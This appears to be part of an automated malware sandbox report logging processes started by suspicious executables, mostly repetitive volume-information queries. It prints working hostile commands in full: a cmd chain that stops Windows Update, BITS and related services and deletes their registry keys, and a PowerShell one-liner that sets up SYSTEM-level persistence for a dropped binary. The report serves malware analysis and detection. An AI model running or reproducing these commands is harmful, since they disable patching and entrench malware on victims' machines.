Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'barac' /tr '''c:\program files\cuis\bon\bara.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\cuis\bon\bara.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'barac' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "barac" /t reg_sz /f /d 'c:\program files\cuis\bon\bara.exe' }
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'barac' /tr '''c:\program files\cuis\bon\bara.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\cuis\bon\bara.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'barac' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "barac" /t reg_sz /f /d 'c:\program files\cuis\bon\bara.exe' }	Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

51_2_0000000140001B54

Source: C:\Windows\System32\dialer.exe

Code function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

51_2_0000000140001B54

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731CB5860 cpuid

0_2_00007FF731CB5860

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00007FF731C9A24C

Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Queries volume information: C:\Users\user\Desktop\F4R5fd8grr.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Queries volume information: C:\Users\user\AppData\Roaming\SubDir\Client.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Queries volume information: C:\Users\user\Desktop\F4R5fd8grr.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
